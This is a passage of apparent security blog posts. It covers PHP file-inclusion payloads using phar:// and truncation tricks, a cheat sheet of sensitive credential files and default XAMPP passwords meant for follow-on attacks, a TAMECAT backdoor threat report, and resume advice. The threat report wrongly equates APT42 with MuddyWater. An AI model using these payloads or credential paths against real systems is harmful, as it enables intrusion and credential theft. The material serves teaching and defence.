" width="800" height="300"></a></p> <p>Relative path:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight cpp"><code><span class="n">fileinclude2</span><span class="p">.</span><span class="n">php</span><span class="o">?</span><span class="n">file</span><span class="o">=</span><span class="n">phar</span><span class="o">:</span><span class="c1">//J0.zip\J0</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbrlrholw3rn8efg0h4t8.png" alt=" " width="799" height="246"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> As with <code>zip://</code> and <code>phar://</code>.</p> <h4> Solution: Length Truncation </h4> <p>PHP version &lt; 5.2.8. Directory strings have maximum length (4096 bytes on Linux, 256 bytes on Windows). Repeating <code>./</code> many times:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>index.php?file<span class="o">=</span>phpinfo.php././././... <span class="o">(</span>repeated<span class="o">)</span> ././ </code></pre> </div> <p>When the maximum is reached, the suffix <code>/test/test.php</code> is discarded.</p> <p>Example on Windows:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude2.php?file<span class="o">=</span>phpinfo.php/./././... <span class="o">(</span>many repetitions<span class="o">)</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6rd5q26rwwvtkea3ffr3.png" alt=" " width="800" height="235"></a></p> <p>Adding too many may exceed capacity:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhq5zzn16hl9an9lqc0h.png" alt=" " width="800" height="244"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code.</p> <h4> Solution: Null Byte Truncation (<code>%00</code>) </h4> <p>Principle: <code>chr(0)</code> acts as a string terminator. Everything after <code>%00</code> is ignored.</p> <p><strong>Requirements:</strong></p> <ul> <li> <code>magic_quotes_gpc = Off</code> (if <code>On</code>, <code>%00</code> becomes <code>\0</code> and is escaped)</li> <li>PHP version &lt; 5.3.4 </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight diff"><code><span class="gh">index.php?file=phpinfo.php%00 </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqphvmgnnvvg6u5orva5l.png" alt=" " width="800" height="196"></a></p> <p><strong>Note on Command Execution and Trojan Writing:</strong> Replace <code>&lt;?php phpinfo();?&gt;</code> with the desired PHP code.</p> <h2> Defence Measures </h2> <ol> <li>Configure PHP's <code>open_basedir</code> to restrict file access to specified directories. This will cause inclusion to fail for files outside the web directory.</li> <li>Manage file permissions carefully.</li> <li>Limit includable files via whitelisting or by setting a dedicated include directory.</li> <li>Filter dangerous characters: <code>.</code> (dot), <code>/</code> (forward slash), <code>\</code> (backslash), and other special characters.</li> <li>Set <code>allow_url_fopen = Off</code> and <code>allow_url_include = Off</code>. Although many pseudo‑protocols still work, this reduces the attack surface.</li> <li>Avoid dynamic inclusion whenever possible.</li> </ol> php cybersecurity vulnerabilities file Windows and Linux Sensitive Directory Path Summary Excalibra Sun, 07 Jun 2026 05:01:24 +0000 https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o https://dev.to/excalibra/windows-and-linux-sensitive-directory-path-summary-3b1o <h1> Windows and Linux Sensitive Directory Path Summary </h1> <blockquote> <p><strong>Abstract:</strong> This article describes how to exploit file inclusion and arbitrary file download vulnerabilities. It provides file lookup commands for different operating systems, lists common configuration file names for Apache, MySQL, PHP, etc., and mentions sensitive files and information, such as probe pages, system files, and critical paths in content management systems (CMS). In addition, default paths for website building tools such as XAMPP and phpStudy are covered, along with relevant files for common CMS platforms.</p> </blockquote> <h2> 0x01 Basic Information </h2> <p>When encountering vulnerabilities such as file inclusion or arbitrary file download, the information in this article can be utilised to facilitate subsequent attacks.</p> <h2> 0x02 Configuration Files </h2> <h3> Finding Files </h3> <p>If command execution is possible, use the lookup commands directly.</p> <p><strong>Linux-related commands:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Find a file</span> find / <span class="nt">-name</span> filename.ext <span class="c"># Search entire disk for files containing 'flag'</span> <span class="nb">grep </span>flag <span class="nt">-r</span> / </code></pre> </div> <p><strong>Windows-related commands:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Search entire disk for a file; be sure to add an asterisk!</span> <span class="k">for</span> /r c:<span class="se">\ </span>%i <span class="k">in</span> <span class="o">(</span>password.txt<span class="k">*</span><span class="o">)</span> <span class="k">do</span> @echo %i <span class="k">for</span> /r c:<span class="se">\ </span>%i <span class="k">in</span> <span class="o">(</span><span class="k">*</span>.ini<span class="o">)</span> <span class="k">do</span> @echo %i <span class="c"># Search drive C: for files containing the string 'password'; double quotes are required!</span> findstr /s /n <span class="s2">"password"</span> c:<span class="se">\*</span> <span class="c"># Check whether pwd.txt contains the string 'password'; double quotes are required!</span> find /N /I <span class="s2">"password"</span> pwd.txt </code></pre> </div> <h3> Common Configuration File Names </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Apache httpd.conf # MySQL my.ini # Virtual host configuration httpd-vhosts.conf # IIS metabase.xml applicationHost.config # SSH /etc/ssh/sshd_config # Nginx /etc/nginx/nginx.conf /etc/nginx/sites-enabled/default # PHP php.ini # WebLogic (read password) ./security/SerializedSystemIni.dat ./config/config.xml </code></pre> </div> <h3> Apache </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Configuration file path</span> /etc/httpd/conf/httpd.conf <span class="c"># Default site path</span> /var/www/html/ <span class="c"># Ubuntu configuration file</span> /etc/apache2/apache2.conf <span class="c"># Access log and error log</span> /private/var/log/apache2/error_log /private/var/log/apache2/access_log </code></pre> </div> <h3> IIS </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Configuration file</span> web.config </code></pre> </div> <h3> MySQL </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Configuration file</span> /etc/my.cnf /etc/mysql/my.cnf </code></pre> </div> <h3> phpMyAdmin </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Configuration file</span> config.inc.php <span class="c"># Default path</span> /var/www/phpmyadmin/config.inc.php </code></pre> </div> <h3> XAMPP Suite </h3> <p><strong>Related paths:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Website default path xampp\htdocs # Apache basic configuration xampp\apache\conf\httpd.conf # Apache SSL xampp\apache\conf\ssl.conf # Apache Perl (plugin only) xampp\apache\conf\perl.conf # Apache Tomcat (plugin only) xampp\apache\conf\java.conf # Apache Python (plugin only) xampp\apache\conf\python.conf # Virtual hosts xampp/apache/conf/extra/httpd-vhosts.conf # PHP xampp\php\php.ini # Database default path xampp\mysql\data # MySQL xampp\mysql\bin\my.ini # phpMyAdmin xampp\phpMyAdmin\config.inc.php # FileZilla FTP server xampp\FileZilla # FTP/FileZilla Server.xml Mercury # Mercury mail server basic configuration xampp\MercuryMail\MERCURY.INI # Sendmail xampp\sendmail\sendmail.ini </code></pre> </div> <p><strong>Default passwords:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># MySQL User: root Password: (empty) # FileZilla FTP User: newuser Password: wampp User: anonymous Password: some@mail.net # Mercury Postmaster: postmaster (postmaster@localhost) Administrator: Admin (admin@localhost) TestUser: newuser Password: wampp # WEBDAV User: wampp Password: xampp </code></pre> </div> <h3> phpStudy Suite </h3> <p>Earlier versions of the phpStudy suite were reported to be problematic, with issues such as port conflicts and poor database management. However, when tested again on Windows (as of August 2019), these problems were no longer observed, reflecting the rapid evolution of technology and product updates.</p> <p>There is also a Pro version, so the paths have changed accordingly. This summary takes the Pro version as an example; for the standard version, simply remove 'Pro'.</p> <p><strong>Related paths:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Root directory phpstudy\WWW phpstudy_pro\WWW # phpMyAdmin phpstudy_pro\WWW\phpMyAdmin4.8.5 # PHP: In the Pro version, plugins are displayed as extensions. phpstudy_pro\Extensions\php\php7.3.4nts\php.ini </code></pre> </div> <h2> 0x03 Sensitive Files </h2> <h3> Probe Information </h3> <p>When using XAMPP/LAMPP/phpStudy/PHPnow, some probe pages may be left behind, revealing useful information, such as <code>Document_Root</code> (representing the website root directory) and <code>session.save_path</code> (storing session information).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1.php l.php p.php probe.php test.php info.php phpinfo.php </code></pre> </div> <h3> Windows </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># View system version</span> c:<span class="se">\b</span>oot.ini <span class="c"># IIS configuration file</span> c:<span class="se">\w</span>indows<span class="se">\s</span>ystem32<span class="se">\i</span>netsrv<span class="se">\M</span>etaBase.xml <span class="c"># Stores the initial installation password for Windows</span> c:<span class="se">\w</span>indows<span class="se">\r</span>epair<span class="se">\s</span>am <span class="c"># MySQL configuration</span> c:<span class="se">\P</span>rogramFiles<span class="se">\m</span>ysql<span class="se">\m</span>y.ini <span class="c"># MySQL root password</span> c:<span class="se">\P</span>rogramFiles<span class="se">\m</span>ysql<span class="se">\d</span>ata<span class="se">\m</span>ysql<span class="se">\u</span>ser.MYD <span class="c"># PHP configuration information</span> c:<span class="se">\w</span>indows<span class="se">\p</span>hp.ini </code></pre> </div> <h3> Linux </h3> <p><strong>Basic Linux privilege escalation paths:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Account information</span> /etc/passwd <span class="c"># Account password file</span> /etc/shadow <span class="c"># Apache2 default configuration file</span> /usr/local/app/apache2/conf/httpd.conf <span class="c"># Virtual website configuration</span> /usr/local/app/apache2/conf/extra/httpd-vhost.conf <span class="c"># PHP configuration file</span> /usr/local/app/php5/lib/php.ini <span class="c"># Apache configuration file</span> /etc/httpd/conf/httpd.conf <span class="c"># MySQL configuration file</span> /etc/my.conf </code></pre> </div> <h2> 0x04 Common CMS Examples </h2> <h3> CMS-A </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/member/templets/menulit.php /plus/paycenter/alipay/return_url.php /plus/paycenter/cbpayment/autoreceive.php /paycenter/nps/config_pay_nps.php /plus/task/dede-maketimehtml.php /plus/task/dede-optimize-table.php /plus/task/dede-upcache.php </code></pre> </div> <h3> CMS-B </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/wp-admin/includes/file.php /wp-content/themes/theme-name/footer.php </code></pre> </div> <h3> CMS-C </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/api/cron.php /wap/goods.php /temp/compiled/ur_here.lbi.php /temp/compiled/pages.lbi.php /temp/compiled/user_transaction.dwt.php /temp/compiled/history.lbi.php /temp/compiled/page_footer.lbi.php /temp/compiled/goods.dwt.php /temp/compiled/user_clips.dwt.php /temp/compiled/goods_article.lbi.php /temp/compiled/comments_list.lbi.php /temp/compiled/recommend_promotion.lbi.php /temp/compiled/search.dwt.php /temp/compiled/category_tree.lbi.php /temp/compiled/user_passport.dwt.php /temp/compiled/promotion_info.lbi.php /temp/compiled/user_menu.lbi.php /temp/compiled/message.dwt.php /temp/compiled/admin/pagefooter.htm.php /temp/compiled/admin/page.htm.php /temp/compiled/admin/start.htm.php /temp/compiled/admin/goods_search.htm.php /temp/compiled/admin/index.htm.php /temp/compiled/admin/order_list.htm.php /temp/compiled/admin/menu.htm.php /temp/compiled/admin/login.htm.php /temp/compiled/admin/message.htm.php /temp/compiled/admin/goods_list.htm.php /temp/compiled/admin/pageheader.htm.php /temp/compiled/admin/top.htm.php /temp/compiled/top10.lbi.php /temp/compiled/member_info.lbi.php /temp/compiled/bought_goods.lbi.php /temp/compiled/goods_related.lbi.php /temp/compiled/page_header.lbi.php /temp/compiled/goods_script.html.php /temp/compiled/index.dwt.php /temp/compiled/goods_fittings.lbi.php /temp/compiled/myship.dwt.php /temp/compiled/brands.lbi.php /temp/compiled/help.lbi.php /temp/compiled/goods_gallery.lbi.php /temp/compiled/comments.lbi.php /temp/compiled/myship.lbi.php /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php /includes/modules/cron/auto_manage.php /includes/modules/cron/ipdel.php </code></pre> </div> <h3> CMS-D </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/admin/inc/hack/count.php?job=list /admin/inc/hack/search.php?job=getcode /admin/inc/ajax/bencandy.php?job=do /cache/MysqlTime.txt /cms-root/ </code></pre> </div> <h3> CMS-E </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/lib/mods/celive/menu_top.php /lib/default/ballot_act.php /lib/default/special_act.php </code></pre> </div> vulnerabilities directory cybersecurity path TAMECAT: APT42's New PowerShell Backdoor Targeting Military and Government Officials Excalibra Tue, 28 Apr 2026 19:06:29 +0000 https://dev.to/excalibra/tamecat-apt42s-new-powershell-backdoor-targeting-military-and-government-officials-14mc https://dev.to/excalibra/tamecat-apt42s-new-powershell-backdoor-targeting-military-and-government-officials-14mc <p><strong>Article Summary:</strong> The Iranian APT42 group is conducting espionage attacks against high-ranking military and government officials using the TAMECAT PowerShell backdoor. This malware features fileless execution, in-memory operation, and Telegram-based C2 channels for covert data exfiltration. This article dissects the attack chain involving VBScript phishing delivery and multi-layer encryption loading, and recommends enterprise EDR deployment, enhanced scripting policies, and security awareness training to build a comprehensive defense system.</p> <p><strong>Article Classification:</strong> Threat Intelligence, Malware, Incident Response</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiqsal90yq7giceox1id.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiqsal90yq7giceox1id.jpg" alt=" " width="800" height="1106"></a></p> <h2> Alert: APT42's New Weapon TAMECAT—Lurking in PowerShell, Targeting Military and Government Elites </h2> <p>In early 2026, Israel's National Cyber Directorate disclosed critical threat intelligence: the Iranian state-sponsored APT42 group is leveraging a PowerShell backdoor named <strong>TAMECAT</strong> to conduct precision espionage attacks against defense officials and core government personnel across multiple nations.</p> <p>This malicious software operates as an "invisible spy"—it writes nothing to disk, runs entirely in memory, and receives commands via Telegram to stealthily exfiltrate browser data, capture screenshots, and even evade mainstream antivirus solutions. More alarmingly, it has undergone multiple iterations with continuously evolving attack techniques, establishing itself as APT42's core weapon for transnational espionage operations.</p> <p>Drawing upon technical analysis reports from Pulsedive and other institutions, Antiy CERT presents a comprehensive dissection of TAMECAT's attack chain, concealment techniques, and defensive countermeasures—illuminating how nation-state actors weaponize scripting tools to achieve precision data theft.</p> <h3> Core Thesis </h3> <p>TAMECAT is a modular PowerShell backdoor designed for "covert infiltration + precision exfiltration." Delivered via VBScript phishing, it is tailored for Windows systems and specifically targets high-value military and government personnel. Its most significant threat lies in its <strong>fileless characteristics combined with multi-layer encryption</strong>, rendering traditional defenses ineffective. Furthermore, its use of social platforms such as Telegram and Discord as C2 channels substantially complicates attribution efforts.</p> <h2> I. Attack Chain Dissection: From Phishing to Exfiltration in Four Stages </h2> <p>TAMECAT's attack flow is highly automated, proceeding from initial user interaction with a malicious file to complete data exfiltration without perceptible intrusion. The complete chain comprises four critical phases:</p> <h3> Stage 1: Delivery—VBScript Phishing with Defense Environment Reconnaissance </h3> <p>The attack typically originates from a spear-phishing email disguised as official correspondence, with an attachment that appears to be an ordinary document but actually contains embedded VBScript.</p> <p>This script functions as a "reconnaissance operative." Upon execution, it immediately queries the target device's installed antivirus software list via WMI:</p> <ul> <li> <strong>If Windows-associated security products are detected</strong>, it invokes <code>conhost</code> to launch PowerShell and retrieves the core payload via remote download utilities;</li> <li> <strong>If no Windows environment is detected</strong>, it employs command-line tools and download utilities to retrieve an alternative malicious program (the link is currently inactive, and the complete sample has not yet been captured).</li> </ul> <p>This "adaptive delivery" design enables TAMECAT to accommodate varying defensive environments, substantially increasing attack success rates.</p> <h3> Stage 2: Loading—Stealth PowerShell Execution with Multi-Layer Encryption Evasion </h3> <p>The successfully downloaded core payload appears to be a standard text file but actually conceals encrypted attack code within a PowerShell script.</p> <p>Its anti-detection techniques are exemplary:</p> <ul> <li> <strong>Command Obfuscation</strong>: Utilizes ambiguous expressions to replace plaintext execution commands, evading script detection mechanisms;</li> <li> <strong>AES Double Encryption</strong>: Core code is first Base64-encoded, then subjected to high-strength encryption; functional modules are only released upon decryption;</li> <li> <strong>Fileless Execution</strong>: Operates entirely in memory without writing any malicious files to disk, making detection by traditional antivirus software extremely difficult.</li> </ul> <h3> Stage 3: Exfiltration—Modular Operation with Targeted Sensitive Data Collection </h3> <p>Once decrypted, TAMECAT activates multiple functional modules that operate as a "spy toolkit" to precisely collect information. Primary targets include:</p> <ul> <li> <strong>Browser Data Theft</strong>: Extracts data from mainstream browsers via remote debugging, suspending browser processes to read cached credentials, passwords, and other sensitive information;</li> <li> <strong>System Information Collection</strong>: Obtains operating system version, computer name, and unique identification tokens, generating victim-specific identifiers stored in system directories;</li> <li> <strong>Screen Surveillance</strong>: Captures screenshots silently to comprehensively record target operational trajectories;</li> <li> <strong>Command Reception</strong>: Receives control commands via Telegram bots, enabling download of additional scripts, execution of various code types, and flexible termination of attack processes.</li> </ul> <p>Notably, APT42 frequently employs social engineering "priming"—first establishing trust relationships with victims before delivering malicious files, substantially reducing suspicion.</p> <h3> Stage 4: Exfiltration—Encrypted Transmission with C2 Channels Hidden in Social Platforms </h3> <p>Collected sensitive data is encrypted and transmitted to control servers via network requests. To evade monitoring, TAMECAT additionally:</p> <ul> <li>Forges browser user-agent strings to masquerade as legitimate network traffic;</li> <li>Stores encrypted key parameters in specialized request headers to increase decryption difficulty;</li> <li>Utilizes not only dedicated servers but also social platforms such as Discord and Telegram as backup control channels, further complicating attribution efforts.</li> </ul> <h2> II. Anomalous Behavior Indicators: Critical Signals for Detection </h2> <p>To rapidly identify TAMECAT attacks, security teams should prioritize monitoring for the following anomalous behaviors, which can be directly incorporated into defensive rules:</p> <ul> <li>Script execution utilities launching PowerShell or command-line tools accompanied by remote download operations;</li> <li>PowerShell processes exhibiting suspicious behaviors such as obfuscated command invocations or anomalous encoded string parsing;</li> <li>Processes attempting to access system local application data directories or creating unidentified configuration files;</li> <li>Encrypted network requests directed at social platform-associated domains with specialized custom fields in request headers.</li> </ul> <h2> III. Defensive Recommendations: Five Critical Actions to Disrupt the Attack Chain </h2> <p>Given TAMECAT's attack characteristics, and drawing upon the Australian Signals Directorate (ASD) PowerShell security guidelines, we recommend constructing a defense system encompassing "endpoint protection, network monitoring, and user education":</p> <ol> <li><p><strong>Deploy EDR/AV Solutions</strong>: Prioritize products supporting PowerShell script monitoring and memory behavior detection, with particular emphasis on intercepting malicious process chains initiated by "VBScript launching PowerShell";</p></li> <li><p><strong>Strengthen PowerShell Security Configuration</strong>: In enterprise environments, enable script execution policies (permitting only signed scripts), and activate script block logging to comprehensively record all PowerShell execution content;</p></li> <li><p><strong>Monitor Critical Network Behaviors</strong>: Intercept suspicious social platform C2 channel access at firewalls and intrusion prevention systems, with particular attention to auditing anomalous network requests containing specialized request headers;</p></li> <li><p><strong>Restrict Sensitive Directory Access</strong>: Implement access controls on critical directories such as system local application data to prevent untrusted processes from creating suspicious files or directories;</p></li> <li><p><strong>Enhance User Security Education</strong>: Specifically alert military, government, and classified personnel to exercise caution regarding unsolicited email attachments—particularly files with <code>.vbs</code> or <code>.docm</code> extensions—and to avoid clicking links from unverified sources.</p></li> </ol> <h2> IV. Attribution: APT42's State-Sponsored Espionage Ambitions </h2> <p>Behind TAMECAT lies the notorious Iranian state-sponsored APT42 group (also known as "MuddyWater"), which has long focused on transnational espionage with attack targets spanning government, defense, and energy sectors across the Middle East, Europe, and Asia.</p> <p>From a technical perspective, APT42's attack methodology demonstrates remarkable consistency: a preference for scripting languages such as PowerShell and VBScript, adept utilization of public cloud platforms for payload storage, and frequent rotation of control channels to evade attribution. The exposure of TAMECAT reaffirms their "modular, covert, and precision-targeted" operational philosophy—achieving long-term surveillance of high-value targets not through complex exploits, but through scripting weapons and social engineering.</p> <p>Of particular concern is that multiple TAMECAT variants share core code logic, including encoding arrays and string substitution obfuscation techniques, indicating that APT42 is continuously iterating its arsenal. Future attacks may target additional platforms and industries.</p> <p>The essence of cybersecurity is adversarial engagement, and the weapon iteration velocity of nation-state actors far exceeds conventional expectations. For military institutions, classified enterprises, and other core entities, traditional defenses alone are no longer sufficient. A three-dimensional defense system integrating "endpoints + networks + personnel" is essential to maintain defensive posture in this invisible battlespace.</p> cybersecurity apt malware powershell 20 Penetration Testing Projects Worth Adding to Your Resume Excalibra Fri, 24 Apr 2026 05:37:20 +0000 https://dev.to/excalibra/20-penetration-testing-projects-worth-adding-to-your-resume-3d34 https://dev.to/excalibra/20-penetration-testing-projects-worth-adding-to-your-resume-3d34 <h2> Article Summary </h2> <p>This article addresses the needs of job seekers aiming for penetration testing positions by curating 20 real-world projects spanning entry‑level to expert‑level scenarios. It emphasises applying the <strong>STAR method</strong> (Situation, Task, Action, Result) and quantifying achievements to enhance resume competitiveness. Core points include: <strong>Entry‑level</strong> projects such as open‑source CMS penetration testing, SRC (Security Response Center) vulnerability mining, and internal network penetration labs; <strong>Intermediate</strong> projects like red‑team attack and defense exercises, cloud environment penetration testing, industrial control system security assessments, code auditing, and antivirus evasion techniques; and <strong>Expert‑level</strong> projects including national “hunt” drills, enterprise security architecture design, APT simulation, toolset development, and data security compliance testing. The article highlights the non‑negotiable prerequisite of legal authorisation, and provides differentiated project recommendations tailored to specific roles (SRC researcher, red‑team operator, compliance auditor). The overarching goal is to demonstrate, through complete and closed‑loop projects, the entire penetration testing workflow, vulnerability discovery capabilities, and experience in defensive remediation.</p> <h2> Introduction </h2> <p>Have you submitted dozens of penetration testing resumes only to hear nothing back? Do you stumble when an interviewer asks, “What is the most technically meaningful project you have worked on?” Many resumes are filled with bullet points like “familiar with OWASP Top 10” and “proficient in Burp Suite and Nessus,” yet still fail the initial screening.</p> <p>Stop making these mistakes. HR and technical reviewers scan hundreds of resumes daily; “tool‑manual” style content leaves no impression. What truly makes a candidate stand out is a <strong>complete, closed‑loop project</strong> with <strong>clear, measurable results</strong> that showcases core competencies.</p> <p>Below are <strong>20 penetration testing projects</strong>, organised in a progressive gradient from entry‑level to expert‑level. Each one is designed to hit precisely the points that interviewers consider as differentiators, transforming your resume from “invisible” to “interview‑winning.”</p> <h2> Prerequisites (Must‑Read) </h2> <ul> <li><p><strong>Compliance is paramount.</strong> All projects must be conducted under <strong>explicit legal authorisation</strong>. Unauthorised probing or attacks against any target are strictly prohibited. Follow the <em>Cybersecurity Law</em>, <em>Data Security Law</em>, and other relevant regulations. Compliance is the fundamental bottom line for every security professional.</p></li> <li><p><strong>Adopt the STAR method.</strong> Describe every project using the structure <strong>Situation</strong> (the context you faced), <strong>Task</strong> (what needed to be accomplished), <strong>Action</strong> (the measures you took), and <strong>Result</strong> (the outcomes achieved). Avoid empty, generic statements.</p></li> <li><p><strong>Quantify results.</strong> Use concrete numbers: for example, “identified <strong>12 high‑risk vulnerabilities</strong> and assisted the organisation in remediation, effectively preventing a data breach that could have exposed <strong>millions of records</strong>,” rather than “performed a penetration test and found some vulnerabilities.”</p></li> <li> <p><strong>Tailor projects to the job role.</strong> </p> <ul> <li>For an in‑house <strong>SRC position</strong>, emphasise <strong>vulnerability discovery</strong> and <strong>incident response</strong>. </li> <li>For a <strong>red‑team role</strong>, highlight <strong>internal network penetration</strong> and <strong>ATT&amp;CK‑based attack simulations</strong>. </li> <li>For a <strong>compliance role</strong>, focus on <strong>regulatory compliance frameworks (e.g., NIST RMF, ISO 27001, or regional standards)</strong> and <strong>data security projects</strong>.</li> </ul> </li> </ul> <h2> Part I: Entry‑Level Projects (6 Projects) </h2> <p>These projects are ideal for <strong>fresh graduates with no prior experience</strong> and <strong>career changers</strong> entering the field. They quickly fill the blank spaces on a resume and help build a solid foundational knowledge framework, moving you beyond the “script kiddie” label.</p> <h3> 1. Full‑Lifecycle Open‑Source CMS Penetration Test </h3> <p><strong>Project Core:</strong><br><br> Focus on mainstream open‑source content management systems such as <strong>Joomla</strong>, <strong>Drupal</strong>, and <strong>WordPress</strong>. Independently execute a complete closed‑loop penetration test covering <strong>information gathering → vulnerability detection → exploitation → Webshell acquisition → persistence → report delivery</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffedi0hs6b38vrajujtoz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffedi0hs6b38vrajujtoz.png" alt=" " width="800" height="1021"></a></p> <p><strong>Resume Highlight:</strong><br><br> Demonstrates full‑chain control of the penetration testing process, not just individual vulnerability exploitation. Write:<br><br> <em>“Independently performed a full‑lifecycle penetration test (SQL injection, file upload, RCE, etc.), discovering no fewer than **5 verified vulnerabilities</em><em>, and produced a complete test report with remediation recommendations.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What was the most challenging defence you encountered during the test? </li> <li>How did you bypass the WAF? </li> <li>What is the core principle behind the remediation you proposed?</li> </ul> <h3> 2. Enterprise SRC Vulnerability Mining Practice </h3> <p><strong>Project Core:</strong><br><br> Sign up with legitimate bug bounty platforms (e.g., <strong>HackerOne</strong>, <strong>Bugcrowd</strong>, <strong>ByteDance</strong>, <strong>Butian</strong>, <strong>Vulbox</strong> or vendor‑specific SRC programs), conduct authorised vulnerability hunting against approved targets, submit findings, and obtain official severity ratings and acknowledgements.</p> <p><strong>Resume Highlight:</strong><br><br> Provides real‑world combat experience in a genuine enterprise environment. Official vulnerability certifications are “hard currency” for new graduates, far more valuable than local lab exercises. Write:<br><br> <em>“Registered on **XX vendor’s SRC platform</em><em>, submitted **8 high‑ and medium‑risk vulnerabilities</em><em>, received official certificates of thanks, and assisted the vendor in remediation and security hardening.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>What is the most technically sophisticated vulnerability you have found? </li> <li>What is your core vulnerability‑hunting methodology? </li> <li>How do you perform targeted vulnerability detection against a specific website?</li> </ul> <h3> 3. Internal Network Penetration Basic Lab Practice </h3> <p><strong>Project Core:</strong><br><br> Use classic internal network labs such as <strong>HTB Active Directory labs</strong> or custom domain environments to build a complete intranet attack chain: <strong>external reconnaissance → boundary breach → internal information gathering → lateral movement → domain penetration → domain controller compromise</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpv90jvp0uv6lovlf1h3o.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpv90jvp0uv6lovlf1h3o.jpg" alt=" " width="800" height="622"></a></p> <p><strong>Resume Highlight:</strong><br><br> Internal network penetration is a key qualification for penetration testing roles. This project directly demonstrates your intranet fundamentals. Write:<br><br> <em>“Independently completed the penetration test of a **multi‑layer internal domain environment</em><em>, proficiently employing techniques such as **PTH, PTT, and token manipulation</em><em>, covering the entire internal network attack chain, and delivered a detailed attack‑path analysis report.”</em></p> <p><strong>Frequently Asked Interview Questions:</strong> </p> <ul> <li>Can you describe the full process of domain 